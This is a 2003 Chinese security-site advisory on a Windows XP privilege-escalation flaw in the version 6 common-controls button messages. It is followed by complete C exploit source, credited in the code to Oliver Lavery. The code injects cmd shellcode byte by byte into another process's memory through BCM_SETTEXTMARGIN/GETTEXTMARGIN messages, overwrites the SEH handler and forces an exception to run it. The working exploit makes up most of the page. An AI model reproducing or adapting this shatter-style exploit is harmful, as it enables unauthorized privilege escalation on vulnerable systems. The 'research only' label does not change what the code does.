首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XP图象式样让权限提升的漏洞
来源:vittersafe.yeah.net 作者:vitter 发布时间:2003-11-05  

XP图象式样让权限提升的漏洞
受影响程序:Windows XP
 
  详细描述:XP的图像式样特征是使用各种 控制机构对XP界面进行优化,并在操作系统中引入了一个新的碎片类型。

  应用程序使用一个CommCtl32.dll(版本6)文件来表现新的类似XP的界面,这个dll文件必须明确地在程序中指定使用,除了让界面漂亮之外,CommCtl32.dll还引入了几种新的windows按钮控制方法:


  * BCM_GETIDEALSIZE
  * BCM_GETIMAGELIST
  * BCM_GETTEXTMARGIN
  * BCM_SETIMAGELIST
  * BCM_SETTEXTMARGIN


  这两个 TEXTMARGIN 消息使用了RECT类型(这是windows广泛采用的一种数据结构,通常作为参数传递给许多api函数。RECT结构表示一个矩形区域,left和top字段描叙了矩形第一个角(通常是左上角),right和bottom字段描叙了矩形的第二个角(通常是右下角)。这两个位置决定了矩形的大小与位置。这些字段采用的单位及坐标系统取决于当前的有效缩放比例、准备表示的对象以及准备调用的api函数。并不要求bottom字段的绝对值大于top字段,而且也可以为负数。)当发送windows消息时,许多使用这个公共图像模式的控制机构能被执行,甚至用一段简单的代码也能写入任意指令到一个使用了新XP按钮控制的应用程序中去。任何使用了XP图像式样的特权程序或在交互桌面打开一个窗口都能被利用来让攻击者提高权限。

  示例代码:(仅做研究之用)


#include <windows.h>
#define _WIN32_WINNT 0x501
#include <commctrl.h>
#include <stdio.h>


// Local Cmd Shellcode.
// Added a loadLibrary call to make sure msvcrt.dll is present -- ol
BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";


char g_classNameBuf[ 256 ];


char tWindow[]="Calculator";// The name of the main window
#define SEH_HANDLER_ADDR 0x77ed73B4  // Critical Address To Overwrite


// you might want to find a less destructive spot to stick the code, but this works for me --ol
#define SHELLCODE_ADDR 0x77ed7484 // Known Writeable Space Or Global Space


// The range between these will be scanned to find our shellcode bytes.
#define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32
#define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes.


void doWrite(HWND hWnd, BYTE tByte, BYTE* address);
void IterateWindows(long hWnd);
void *FindByteInKernel32( BYTE byte );


void ErrorTrace(const char *msg, DWORD error)
{
  DWORD numWritten;


  WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL);
  if (error) {
   LPTSTR lpMsgBuf;


   FormatMessage(
    FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
    NULL,
    error,
    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
    (LPTSTR) &lpMsgBuf,
   0,
  NULL
  );
  WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL);
  // Free the buffer.
  LocalFree( lpMsgBuf );
}
}


//"Should there be a reason to believe that code that comes from a variety
//of people, unknown from around the world, should be somehow of higher quality
//than that from people who get paid to do it professionally?"
// - Steve Ballmer
// (Hey, wait, are MS employees generally household names?
// Isnt MS an equal opportunity employer?)


int main(int argc, char *argv[])
{
long hWnd;
HMODULE hMod;
DWORD ProcAddr;
printf("%% Playing with CommCtrl 6.0 messages\n");
printf("%% Oliver Lavery.\n\n");
printf("%% based on Shatter SEH code by\n");
printf("%% brett moore security-assessment com\n\n");


// Find local procedure address
hMod = LoadLibrary("kernel32.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
if(ProcAddr != 0)
 // And put it in our shellcode
 *(long *)&exploit[13] = ProcAddr;


hMod = LoadLibrary("msvcrt.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "system");
if(ProcAddr != 0)
 // And put it in our shellcode
 *(long *)&exploit[26] = ProcAddr;


printf("+ Finding %s Window...\n",tWindow);
hWnd = (long)FindWindow(NULL,tWindow);
if(hWnd == NULL)
{
 printf("+ Couldnt Find %s Window\n",tWindow);
 return 0;
}
printf("+ Found Main Window At...0x%xh\n",hWnd);
IterateWindows(hWnd);
printf("+ Not Done...\n");
return 0;
}


void *FindByteInKernel32( BYTE byte )
{
BYTE *addr = KERN32_BASE_ADDR;
while ( addr < KERN32_TOP_ADDR ) {
  if ( *addr == byte ) return addr;
addr++;
}
ErrorTrace( "Couldnt find a shellcode byte in kernel32. Sorry.", 0 );
exit(0);
}


//"Should there be any reason to believe that a relatively small group of
//paid programmers working under the direction of a marketing machine can produce
//code approaching the quality of a global team linked by the internet, whose
//every line of code is subject to ruthless peer review, and whose only standard
//is excellence?"
// - crunchie812


void doWrite(HWND hWnd, BYTE tByte, BYTE *address)
{
void *byte_addr;
byte_addr = FindByteInKernel32( tByte );
SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr);
if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) {
  ErrorTrace( "error", GetLastError() );
}
}


void IterateWindows(long hWnd)
{
long childhWnd,looper;
childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
while ( strcmp(g_classNameBuf, "Button") )
{
// IterateWindows(childhWnd);
 childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
 GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
}


if(childhWnd != NULL)
{
 printf("+ Found button control..0x%xh\n",childhWnd);


 // Inject shellcode to known address
 printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR);
 for (looper=0;looper<sizeof(exploit);looper++)
  doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR + looper));


 // Overwrite SEH
 printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR);
 doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE *)SEH_HANDLER_ADDR);
 doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR+1);
 doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR+2);
 doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR+3);


 // Cause exception
 printf("+ Forcing Unhandled Exception\n");
 doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF);
 printf("+ Done...\n");
 exit(0);
}
} 
 
  目前厂商未公布该缺陷补丁。




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RPC溢出漏洞(MS03-26)攻击代码
·85NIPrint.c 远程攻击程序
·WS_FTP FTPD "STAT"命令远程溢出
·EPIC4 remote client-side stack
·linx86_sendmail.c
·phpBB v2.06 search_id sql inje
·smartass.pl
·phpbb_sql.pl
·Local Exploit for a buffer ove
·MS03-043 - Messenger exploit b
·cvs_solaris_HEAP.c
·vBulletin Forum 2.3.xx SQL Inj
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved